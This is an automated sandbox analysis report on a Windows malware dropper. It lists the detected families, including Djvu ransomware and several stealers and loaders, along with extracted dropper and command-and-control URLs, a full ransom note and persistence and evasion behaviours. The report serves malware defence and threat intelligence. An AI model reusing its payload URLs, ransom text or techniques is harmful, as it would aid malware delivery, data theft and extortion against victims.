djvu | 809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b

Analysis

max time kernel
94s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
12-03-2022 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe
Size

9.0MB
MD5

fecb05a97813139ab0b3cbf1af02bdd0
SHA1

5eafb4e3e8d22a6562b32da8cee5d1ed2bf841e0
SHA256

809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b
SHA512

bceae3adeaa5be3fffc0405decd48ee57ce8c3ce77cda5461f1b53170b1b72d92ed6f7eced414e647bfe7924d3ead073ff6738cb54a264d988bb3e56a35793b9

Score

10^/10

djvu glupteba metasploit onlylogger smokeloader socelars tofsee vidar backdoor dropper evasion loader persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

tofsee

patmushta.info

ovicrush.cn

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5128-279-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5128-281-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5128-283-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5128-285-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3656-173-0x00000000051D0000-0x0000000005AF6000-memory.dmp	family_glupteba
behavioral2/memory/3656-175-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/4436-193-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/1232-200-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	2312	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3252	2312	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4060	2312	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3216	2312	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5416	2312	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	2312	schtasks.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 3660 created 3656 3660 svchost.exe Info.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	process	target process
PID 3660 created 3656	3660	svchost.exe	Info.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/428-254-0x0000000000500000-0x0000000000544000-memory.dmp	family_onlylogger
behavioral2/memory/428-255-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Blocklisted process makes network request 10 IoCs

Processes:

schtasks.exe

flow	pid	process
195	3436	schtasks.exe
196	3436	schtasks.exe
197	3436	schtasks.exe
198	3436	schtasks.exe
199	3436	schtasks.exe
200	3436	schtasks.exe
201	3436	schtasks.exe
202	3436	schtasks.exe
203	3436	schtasks.exe
205	3436	schtasks.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 35 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeInfo.exeUpdbdate.exeFile.exeFolder.exeInstall.exepub2.exeFiles.exejfiag3g_gg.exejfiag3g_gg.exeInfo.execsrss.exezKokun_jEHemVAAsWgW_pab3.exetevoY1KiB43L3jCIdZQ5ajbt.exexNhQTlVNHSkmLF7GCZkFJiTd.exeHOKnoPFdltTtIbOUvX6L1Ept.exeYRVbTmCQMqPXQ19Ies9fEBwl.exegCDsyXILUpUfXemHUvJEr0TO.exee7rUYYQ6omMv05JKEC1mSxA4.exeqYCp5CH0TTpX7dJ6esjqeeHu.exeT_xxcWtUW1rS5NZBq5PQSIc1.exe6Dle_A69lpNXU_A8LIIjG82c.exeschtasks.exeyuV8JaQkflxpgPaEr5wmHrHU.exerU5pGOi7qyJAO8IGAKODku_I.exe585WZ5oegGODOHtxXkp4vulx.exe6g5pAeGh5k6bIJzlKBftWfIV.exexj5UBk4j3LIjsMCYOaFbMa8b.exeEw4_GcQMa47V7r87EU62idmh.exe4A9b8IJJcbjsBArYqp1xNyoO.exe8sS1hp2i03Ah5WkY3UjDU_zx.exe2Sr8vhAo0wxpWZEkp1nO29eX.exe_KprUxb_aP2eE5NFB2PAmsTf.exe

pid	process
1420	SoCleanInst.exe
2836	md9_1sjm.exe
3820	Folder.exe
3656	Info.exe
3760	Updbdate.exe
3436	File.exe
228	Folder.exe
1208	Install.exe
1676	pub2.exe
1536	Files.exe
3988	jfiag3g_gg.exe
3696	jfiag3g_gg.exe
4436	Info.exe
1232	csrss.exe
2196	zKokun_jEHemVAAsWgW_pab3.exe
2584	tevoY1KiB43L3jCIdZQ5ajbt.exe
524	xNhQTlVNHSkmLF7GCZkFJiTd.exe
4048	HOKnoPFdltTtIbOUvX6L1Ept.exe
3108	YRVbTmCQMqPXQ19Ies9fEBwl.exe
428	gCDsyXILUpUfXemHUvJEr0TO.exe
1508	e7rUYYQ6omMv05JKEC1mSxA4.exe
4400	qYCp5CH0TTpX7dJ6esjqeeHu.exe
1092	T_xxcWtUW1rS5NZBq5PQSIc1.exe
3720	6Dle_A69lpNXU_A8LIIjG82c.exe
4060	schtasks.exe
3828	yuV8JaQkflxpgPaEr5wmHrHU.exe
4024	rU5pGOi7qyJAO8IGAKODku_I.exe
1288	585WZ5oegGODOHtxXkp4vulx.exe
4912	6g5pAeGh5k6bIJzlKBftWfIV.exe
2724	xj5UBk4j3LIjsMCYOaFbMa8b.exe
2460	Ew4_GcQMa47V7r87EU62idmh.exe
4932	4A9b8IJJcbjsBArYqp1xNyoO.exe
2108	8sS1hp2i03Ah5WkY3UjDU_zx.exe
3840	2Sr8vhAo0wxpWZEkp1nO29eX.exe
1100	_KprUxb_aP2eE5NFB2PAmsTf.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\6Dle_A69lpNXU_A8LIIjG82c.exe	upx
C:\Users\Admin\Pictures\Adobe Films\6Dle_A69lpNXU_A8LIIjG82c.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exeFolder.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2940 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2940	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DelicateWave = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

217 ipinfo.io
233 ipinfo.io
234 ipinfo.io
237 ipinfo.io
252 ipinfo.io
41 ip-api.com
105 ipinfo.io
106 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

yuV8JaQkflxpgPaEr5wmHrHU.exe

pid process

3828 yuV8JaQkflxpgPaEr5wmHrHU.exe
Drops file in Windows directory 2 IoCs

Processes:

Info.exe

description ioc process

File opened for modification C:\Windows\rss Info.exe
File created C:\Windows\rss\csrss.exe Info.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
217	ipinfo.io
233	ipinfo.io
234	ipinfo.io
237	ipinfo.io
252	ipinfo.io
41	ip-api.com
105	ipinfo.io
106	ipinfo.io

pid	process
3828	yuV8JaQkflxpgPaEr5wmHrHU.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2996	2940	WerFault.exe	rundll32.exe
4176	3656	WerFault.exe	Info.exe
3544	3656	WerFault.exe	Info.exe
1516	3656	WerFault.exe	Info.exe
1352	3656	WerFault.exe	Info.exe
1836	3656	WerFault.exe	Info.exe
4324	3656	WerFault.exe	Info.exe
228	3656	WerFault.exe	Info.exe
1240	3656	WerFault.exe	Info.exe
2240	3656	WerFault.exe	Info.exe
2212	3656	WerFault.exe	Info.exe
3192	3656	WerFault.exe	Info.exe
3568	3656	WerFault.exe	Info.exe
2596	3656	WerFault.exe	Info.exe
4848	3656	WerFault.exe	Info.exe
3764	3656	WerFault.exe	Info.exe
3132	3656	WerFault.exe	Info.exe
3800	3656	WerFault.exe	Info.exe
2724	3656	WerFault.exe	Info.exe
3804	3656	WerFault.exe	Info.exe
1676	3656	WerFault.exe	Info.exe
3196	3656	WerFault.exe	Info.exe
3620	4436	WerFault.exe	Info.exe
428	4436	WerFault.exe	Info.exe
624	4436	WerFault.exe	Info.exe
1060	4436	WerFault.exe	Info.exe
3940	4436	WerFault.exe	Info.exe
4024	4436	WerFault.exe	Info.exe
4912	4436	WerFault.exe	Info.exe
3680	4436	WerFault.exe	Info.exe
3212	4436	WerFault.exe	Info.exe
4532	4436	WerFault.exe	Info.exe
4176	4436	WerFault.exe	Info.exe
396	4436	WerFault.exe	Info.exe
1632	4436	WerFault.exe	Info.exe
4108	4436	WerFault.exe	Info.exe
2644	4436	WerFault.exe	Info.exe
2996	4436	WerFault.exe	Info.exe
2412	1232	WerFault.exe	csrss.exe
3924	1232	WerFault.exe	csrss.exe
2228	1232	WerFault.exe	csrss.exe
1216	1232	WerFault.exe	csrss.exe
2708	1232	WerFault.exe	csrss.exe
2372	1232	WerFault.exe	csrss.exe
4264	1232	WerFault.exe	csrss.exe
4816	1232	WerFault.exe	csrss.exe
4616	1232	WerFault.exe	csrss.exe
4504	1232	WerFault.exe	csrss.exe
4152	1508	WerFault.exe	e7rUYYQ6omMv05JKEC1mSxA4.exe
2708	4060	WerFault.exe	6TW3uUNZSGdw7jPBeCzlHQXm.exe
1952	1288	WerFault.exe	585WZ5oegGODOHtxXkp4vulx.exe
1300	428	WerFault.exe	gCDsyXILUpUfXemHUvJEr0TO.exe
392	1508	WerFault.exe	e7rUYYQ6omMv05JKEC1mSxA4.exe
3628	1288	WerFault.exe	585WZ5oegGODOHtxXkp4vulx.exe
1332	4060	WerFault.exe	6TW3uUNZSGdw7jPBeCzlHQXm.exe
4856	428	WerFault.exe	gCDsyXILUpUfXemHUvJEr0TO.exe
5760	5128	WerFault.exe	8sS1hp2i03Ah5WkY3UjDU_zx.exe
5872	2724	WerFault.exe	xj5UBk4j3LIjsMCYOaFbMa8b.exe
5864	428	WerFault.exe	gCDsyXILUpUfXemHUvJEr0TO.exe
6120	1232	WerFault.exe	csrss.exe
4392	428	WerFault.exe	gCDsyXILUpUfXemHUvJEr0TO.exe
2136	4024	WerFault.exe	rU5pGOi7qyJAO8IGAKODku_I.exe
1152	1232	WerFault.exe	csrss.exe
5844	428	WerFault.exe	gCDsyXILUpUfXemHUvJEr0TO.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5268	schtasks.exe
3252	schtasks.exe
3216	schtasks.exe
5416	schtasks.exe
4896	schtasks.exe
5260	schtasks.exe
4060	schtasks.exe
2180	schtasks.exe
3436	schtasks.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4060 taskkill.exe
5396 taskkill.exe

pid	process
4060	taskkill.exe
5396	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Info.exe
